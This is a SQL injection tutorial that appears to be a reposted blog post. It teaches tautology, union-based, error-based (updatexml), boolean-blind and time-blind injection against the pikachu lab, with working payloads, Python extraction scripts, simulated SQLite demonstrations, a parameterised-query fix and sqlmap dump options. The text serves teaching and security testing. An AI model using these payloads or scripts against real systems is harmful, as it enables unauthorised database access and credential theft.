[Database] SQL injection from 0 to 1

Table of contents

Foreword
1. [Getting started] Basic query injection
1.0 Experimental environment
1.1 Run an ordinary query
1.2 Inject to get user information
1.2.1 Running the injection
1.2.2 Analysis of the injected statement
1.3 The difference between integer and character injection
2. [Advanced] Step-by-step injection from database to column
2.1 Prerequisites
2.1.1 The union operator
2.1.2 The order by clause
2.1.3 The information_schema database
2.2 Hands-on injection
2.2.1 Determine the number of columns
2.2.2 Find the database name
2.2.3 Find all table names in the database
2.2.4 Find all column names in the table
2.2.5 Query the data in the table by column
2.2.6 Summary
3. [Advanced] Error-based injection
3.1 Related functions
3.1.1 extractvalue()
3.1.2 updatexml()
3.2 Hands-on injection
4. [Advanced] Boolean-based blind injection
4.1 What is boolean-based blind injection
4.2 Boolean-based blind injection example
4.3 Boolean-based blind injection script
5. [Advanced] Time-based blind injection
5.1 What is time-based blind injection
5.2 Time-based blind injection example
5.3 Time-based blind injection script
6. [Additional] Using sqlmap
6.1 What is sqlmap
6.2 Basic usage


Foreword:

  SQL injection, one of the OWASP Top 10 vulnerability classes, is the technique of inserting malicious SQL into the input parameters of a web application so that the back-end database server executes it. The root cause is that data coming from the front end is spliced into a SQL statement without strict validation, so the incoming "data" is parsed and executed as part of the statement. The consequences range from damage to the database to leakage of users' private and confidential data.

1. [Getting started] Basic query injection:

1.0 Experimental environment:

The table used for the experiment is:

Suppose the background query statement is:

select password from users where id='$_GET['id']';

Reading the statement: the id parameter we submit with GET is placed inside the single quotes, the database finds the rows whose id column equals that value, and the value of the password column of those rows is returned

1.1 Run an ordinary query:

The statement is:

select password from users where id='tom';

Here the id parameter we submit is tom, so the query looks up tom's password in the table

The result is:

Obviously, we got Tom's password

1.2 Inject to get user information:

1.2.1 Running the injection:

The injected statement is:

select password from users where id='tom' or 1=1;#';

# the id we pass in is:  tom' or 1=1;#

The result is:

We can see that every user's password is exposed

1.2.2 Analysis of the injected statement:

The id value we pass to the back end is:

tom' or 1=1;#

The query formed in the back end is:

select password from users where id='tom' or 1=1;#'

Two of the single quotes belong to the original query (the one before tom and the last one); the quote directly after tom is the one we passed in

  • The query's opening quote is now paired with the quote we supplied, so the string literal is closed early after tom and id='tom' becomes the first condition. The query's own closing quote is commented out by our # (# starts a comment in MySQL), so the parser never sees it
  • or is the logical OR operator
  • The second condition is 1=1, which is always true (1 always equals 1)

The query can therefore be simplified to:

select password from users where id='tom' or True;

which can be read as id='tom' or true

Because the condition is true for every row of the table, whatever its id, the database returns the password of every row

1.3 The difference between integer and character injection:

The examples above are character-type injections, which are the kind most often met in practice

The two query statements compare as follows:

select password from users where id='$_GET['id']'; # character type
The parameter is placed inside single quotes, because a string literal has to be quoted, so this is character type

select password from users where id=$_GET['id'];  # integer type
There are no quotes around the parameter, so this is integer type

With integer-type injection there is no quote to close (the back-end statement has none), so the payload needs no leading quote: inject the condition directly and, if anything follows the parameter in the statement, comment it out at the end, e.g. 1 or 1=1#
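As an added example (not part of the original post), the following Python script simulates the back end with an in-memory SQLite database, so the character-type and integer-type splicing above can be run side by side with a parameterised query. Assumptions: SQLite stands in for MySQL (its comment marker is `-- ` where the text uses `#`), the table and its rows are constructed, and `uid` is an extra integer column added for the integer-type case.

```python
import sqlite3

# Constructed fixture: an in-memory SQLite table standing in for the MySQL `users` table.
# `id` is the string column from the text; `uid` is an integer column for the integer-type case.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (uid INTEGER, id TEXT, password TEXT)")
conn.executemany(
    "INSERT INTO users VALUES (?, ?, ?)",
    [(1, "tom", "t0m_pw"), (2, "jerry", "j3rry_pw"), (3, "admin", "s3cr3t")],
)


def lookup_string_vulnerable(user_id: str) -> list:
    """Character-type query: the parameter is spliced inside single quotes (id='$_GET['id'])."""
    sql = f"select password from users where id='{user_id}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_int_vulnerable(user_no: str) -> list:
    """Integer-type query: the parameter is spliced without quotes (id=$_GET['id'])."""
    sql = f"select password from users where uid={user_no}"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(user_id: str) -> list:
    """Fixed version: a parameterised query. The value is sent separately from the SQL text,
    so it is compared literally as an id and can never change the statement's structure."""
    sql = "select password from users where id=?"
    return [row[0] for row in conn.execute(sql, (user_id,))]


if __name__ == "__main__":
    # Character type: our quote closes 'tom', `or 1=1` is true for every row,
    # and `-- ` comments out the query's trailing quote (MySQL would also accept `#`).
    print(lookup_string_vulnerable("tom"))               # tom's password only
    print(lookup_string_vulnerable("tom' or 1=1 -- "))   # every password in the table
    # Integer type: no quote to close, the payload starts straight with the operator.
    print(lookup_int_vulnerable("1 or 1=1"))             # every password in the table
    # The same payload against the parameterised query matches no row at all.
    print(lookup_safe("tom' or 1=1 -- "))                # []
```

Running the script shows the three outcomes next to each other: the tautology dumps the whole table through either vulnerable function, while the parameterised version treats the payload as one odd-looking id and returns nothing.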

2. [Advanced] Step-by-step injection from database to column:

   Given a query-type injection point, we can read not only more rows of the kind the page normally shows, but also the database version and name and the names of every table and column, and from there any data we choose.

2.1 Prerequisites:

2.1.1 The union operator:

union combines the result sets of the select statements before and after it, removes duplicate rows (union all keeps them), and does not guarantee the order of the combined rows. The two select statements must return the same number of columns. This lets us attach a select statement of our own to the application's query and have the information we want rendered in the page alongside the normal results

2.1.2 The order by clause:

order by followed by a number sorts the result by that column of the select: 1 is the first column, 2 the second, and so on. If the number is larger than the number of columns the select returns, MySQL fails with Unknown column 'n' in 'order clause'. So by increasing the number until the query fails we learn how many columns the original select statement returns

2.1.3 The information_schema database:

This is the information database that ships with MySQL. It stores database metadata (data about the data), such as database names, table names, column names and data types, and access privileges. The tables of every database are listed in information_schema.tables (columns table_schema and table_name), and the columns of every table in information_schema.columns (table_schema, table_name and column_name)

The tables it contains are shown below:

2.2 Hands-on injection:

Here we use the pikachu vulnerable lab as the target

2.2.1 Determine the number of columns:

xx' order by 2#

2 gives no error and 3 gives an error, so the back-end query returns 2 columns, and the select statement we append must also have 2 columns

The result is:

2.2.2 Find the database name:

xx' union select database(),1# 

database() is a MySQL built-in function that returns the name of the current database

The 1 is padding, because the original select statement has 2 columns

The result is:

 

2.2.3 Find all table names in the database:

  • Here we use the tables table of the information_schema database, which holds information about every table on the server; filtering on table_schema restricts it to the pikachu database (table_schema=database() works as well if the name is not known yet)
xx' union select 1,table_name from information_schema.tables where table_schema="pikachu"#

  The result is:

2.2.4 Find all column names in the table:

  • Here we use the columns table of the information_schema database, which holds information about every column of every table. Note that the filter below matches every table called users in any database on the server; add and table_schema="pikachu" (or =database()) to restrict it to the current one
1' union select 1,column_name from information_schema.columns where table_name="users"#

The result is:

2.2.5 Query the data in the table by column:

xx' union select username,password from users#

The result is:

2.2.6 Summary:

  • We first revealed the name of the current database, then the names of all the tables in that database, picked the users table, revealed all of its column names, and finally read the username and password columns with a union select
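Added example, not from the original post: the whole chain of section 2.2 run as a script. The target is a constructed two-column query over an in-memory SQLite database; SQLite has no information_schema, so its sqlite_master table stands in for information_schema.tables and the pragma_table_info() function for information_schema.columns, and `||` replaces MySQL's concat(). The `xx'` prefix, the order by probing and the literal padding are exactly as in the text; the table and row contents are constructed.

```python
import sqlite3

# Constructed fixture: SQLite stands in for MySQL. sqlite_master plays the role of
# information_schema.tables and pragma_table_info() that of information_schema.columns.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE member (username TEXT, email TEXT, pw TEXT);
INSERT INTO member VALUES ('vince', 'vince@pikachu.com', 'abc123');
INSERT INTO member VALUES ('allen', 'allen@pikachu.com', 'qwerty');
CREATE TABLE message (content TEXT);
""")


def vulnerable_query(username: str) -> list:
    """The target's query: two columns, parameter spliced into single quotes.
    Database errors propagate, like a page that prints them to the user."""
    sql = f"select username, email from member where username='{username}'"
    return conn.execute(sql).fetchall()


def count_columns(max_cols: int = 20) -> int:
    """order by n fails as soon as n exceeds the column count of the original select."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_query(f"xx' order by {n} -- ")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError(f"more than {max_cols} columns")


def union_extract(expr: str, source: str) -> list:
    """Append our own select, padding with literal 1s so both selects have the same width.
    'xx' matches no row, so every returned row comes from the injected select."""
    pad = "".join(", 1" for _ in range(count_columns() - 1))
    rows = vulnerable_query(f"xx' union select {expr}{pad} from {source} -- ")
    return [row[0] for row in rows]


def enumerate_database() -> dict:
    """The chain of section 2.2: column count -> table names -> column names -> data."""
    tables = union_extract("name", "sqlite_master where type='table'")       # information_schema.tables
    columns = union_extract("name", "pragma_table_info('member')")           # information_schema.columns
    data = union_extract("username || ':' || pw", "member")                  # MySQL: concat(username,':',pw)
    return {"column_count": count_columns(), "tables": tables, "columns": columns, "data": data}


if __name__ == "__main__":
    for key, value in enumerate_database().items():
        print(key, value)
```

Joining two columns into one with the concatenation expression is the usual way to read more fields than the original select has columns for; with more padding slots available you could instead place one field in each.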

3. [Advanced] Error-based injection:

In some environments the result of an injected select is not displayed, but the application prints the database's error messages. We can then inject functions that raise an error containing part of their input, and carry the data we want out inside the error text

3.1 Related functions:

3.1.1 extractvalue()

The format is:

extractvalue(xml_document, XPath_string)

xml_document: a string containing the XML document

XPath_string: an XPath expression used to locate the value to extract

  • If XPath_string is not a syntactically valid XPath expression, MySQL raises XPATH syntax error and echoes the offending expression in the error message. So if we build the XPath argument from the result of our own query and prefix it with a character that is illegal in XPath, such as ~ (0x7e), the query result comes back to us inside the error message. The error message shows at most 32 characters of the expression, so longer results have to be read in pieces with substr()

3.1.2 updatexml()

The format is:

updatexml(xml_document, XPath_string, new_value)
xml_document: a string containing an XML document
XPath_string: an XPath expression used to locate the node to modify
new_value: the new value to substitute

  • This function behaves the same way: an invalid XPath expression raises the same error, so it is exploited exactly like extractvalue()

3.2 Hands-on injection

Again we use the pikachu vulnerable lab as the target

payload:

xx' and updatexml(1,concat(0x7e,database(),0x7e),1)#

 The database name appears in the error message as XPATH syntax error: '~pikachu~' (this only queries the database name as an example; the steps are the same as in section 2, just replace database() inside the XPath_string parameter with the corresponding query, such as (select group_concat(table_name) from information_schema.tables where table_schema=database())). The technique only works when the application shows the raw database error; if errors are hidden, fall back to the blind methods below

4. [Advanced] Boolean-based blind injection:

4.1 What is boolean-based blind injection:

Boolean-based blind injection is a SQL injection technique built on true/false logic. Nothing from the query is displayed, but the page responds differently depending on whether the injected condition is true or false, so the attacker constructs boolean expressions and reads the answer off the two distinguishable responses

4.2 Boolean-based blind injection example:

For example, pikachu's boolean blind level: when the submitted username exists the page says so, and when it does not exist it always returns the same fixed sentence

So we can tell from the returned text whether the injected condition was true or false

4.3 Boolean-based blind injection script:

  • The script joins our condition with and to a query that is known to return a result. For each position of the database name it tests ascii(substr(database(),i,1))>mid and narrows mid by binary search over the ASCII table; the page only shows the success marker when the whole condition is true. Doing this by hand is practically impossible, it takes far too long, so in most cases a script is used
// this script only extracts the database name; to extract other information, change the payload by hand

import requests

url = "xxxx/?id="        # target URL, the payload is appended as the parameter value
flag = ""                # characters recovered so far

for i in range(1, 10):   # position in the string; widen the range for longer names
    print(i)
    low = 0              # ascii('') is 0, so a result of 0 marks the end of the string
    high = 127           # the code point always lies in [low, high]
    while low < high:
        mid = (low + high) // 2
        # the prefix (1') must select an existing row, otherwise `and` is always false
        payload = "1' and ascii(substr(database(),%d,1))>%d--+" % (i, mid)
        r = requests.get(url=url + payload)
        if "You are in" in r.text:   # success marker shown only when the condition is true
            low = mid + 1
        else:
            high = mid
    if low == 0:         # ran past the end of the string
        break
    flag = flag + chr(low)
    print(flag)

5. [Advanced] Time-based blind injection:

5.1 What is time-based blind injection:

Time-based blind injection is a SQL injection technique based on response time. In some cases the page returns the same result whether or not the condition holds, so nothing in the content tells us if the injection worked. The attacker then uses a delay function such as sleep() or benchmark() in the injected statement to make the database pause for a set time when the condition is true, and judges the condition from how long the page takes to respond

5.2 Time-based blind injection example:

For example, pikachu's time blind level: when we enter a username that does not exist, it returns the same sentence

 Whether or not the data we submit exists, the response is identical, so the only way to tell a true condition from a false one is the response time

5.3 Time-based blind injection script:

  •  Adapt the url and payload to the actual target. The principle is the same as the boolean-based script, with the response time as the oracle instead of the page text
this script only extracts the database name; to extract other information, change the payload by hand

import time
import requests

flag = ""
session = requests.Session()
url = "xxx/?id="         # target URL, the payload is appended as the parameter value

for i in range(1, 100):  # position in the string
    print(i)
    low = 0              # ascii('') is 0, so a result of 0 marks the end of the string
    high = 127           # the code point always lies in [low, high]
    while low < high:
        mid = (low + high) // 2
        # the prefix (1') must select an existing row: `and` is evaluated per row and
        # short-circuits, so with a nonexistent id sleep() would never run
        payload = "1' and if(ascii(substr(database(),%d,1))>%d,sleep(1),1)--+" % (i, mid)
        start_time = time.time()
        session.get(url=url + payload)
        elapsed = time.time() - start_time
        if elapsed > 1:  # delayed response: the condition was true
            low = mid + 1
        else:
            high = mid
    if low == 0:         # ran past the end of the string
        break
    flag = flag + chr(low)
    print(flag)
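The two scripts above (sections 4.3 and 5.3) differ only in the oracle: one reads the page text, the other the response time. The following added example (not from the original post) factors the binary search into one function and runs it with both oracles against a simulated vulnerable page. Assumptions: the page, table and rows are constructed; SQLite stands in for MySQL, so the MySQL functions the payloads call, database(), ascii() and sleep(), are registered as user-defined functions (database() returns the constructed name pikachu), MySQL's if() is written as a CASE expression, and the comment marker is `-- ` instead of `#`/`--+`.

```python
import sqlite3
import time
from typing import Callable

DELAY = 0.05  # seconds the time-based payload asks sleep() for (constructed value)

# Constructed fixture: SQLite stands in for MySQL, so the MySQL functions used by the
# payloads are registered here. ascii('') returns 0, as in MySQL.
conn = sqlite3.connect(":memory:")
conn.create_function("database", 0, lambda: "pikachu")
conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
conn.create_function("sleep", 1, lambda secs: time.sleep(secs) or 0)
conn.execute("CREATE TABLE member (username TEXT, pw TEXT)")
conn.execute("INSERT INTO member VALUES ('tom', 'abc123')")


def page(username: str) -> str:
    """Vulnerable page: splices the parameter and shows one of two fixed sentences."""
    sql = f"select username from member where username='{username}'"
    return "You are in" if conn.execute(sql).fetchall() else "username does not exist"


def boolean_oracle(condition: str) -> bool:
    """True when the page shows the 'exists' branch, i.e. the injected condition held."""
    return "You are in" in page(f"tom' and {condition} -- ")


def time_oracle(condition: str) -> bool:
    """True when the response is delayed; the page text is identical either way."""
    payload = f"tom' and (case when {condition} then sleep({DELAY}) else 0 end) -- "
    start = time.monotonic()
    page(payload)
    return time.monotonic() - start >= DELAY / 2


def blind_extract(oracle: Callable[[str], bool], expr: str = "database()", max_len: int = 64) -> str:
    """Recover expr one character at a time, binary-searching its code point via the oracle."""
    out = ""
    for i in range(1, max_len + 1):
        low, high = 0, 127  # the code point is known to lie in [low, high]
        while low < high:
            mid = (low + high) // 2
            if oracle(f"ascii(substr({expr},{i},1))>{mid}"):
                low = mid + 1
            else:
                high = mid
        if low == 0:  # ascii('') == 0: ran past the end of the string
            break
        out += chr(low)
    return out


if __name__ == "__main__":
    print("boolean:", blind_extract(boolean_oracle))
    print("time:   ", blind_extract(time_oracle))
```

The prefix tom must match an existing row: the where clause evaluates `and` per row and short-circuits, so with a nonexistent name the sleep() branch would never run and the boolean page would never show the success marker. The time threshold is half the requested delay, which tolerates jitter while still separating the two cases; against a real target, measure the baseline response time first and choose the sleep accordingly.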

6. [Additional] Using sqlmap:

6.1 What is sqlmap:

  sqlmap is an open source automated SQL injection tool that detects and exploits SQL injection vulnerabilities in web applications and extracts sensitive information from the database. It supports many database types (MySQL, Oracle, PostgreSQL, etc.) and operating systems (Windows, Linux, etc.), and can be downloaded from the official website, https://sqlmap.org

6.2 Basic usage:

sqlmap -u  "http://www.xx.com?id=x"    test whether the parameter is injectable

The following options are added to that command:

         --dbs        list the databases on the server

         --current-db       get the name of the current database

         --tables -D  "db_name"  list the tables in the given database
         --columns  -T  "table_name"  -D  "db_name"     list the columns of the given table

         --dump -C  "columns_name"  -T "table_name"  -D  "db_name"     dump the data of the given columns


Origin blog.csdn.net/Elite__zhb/article/details/130436909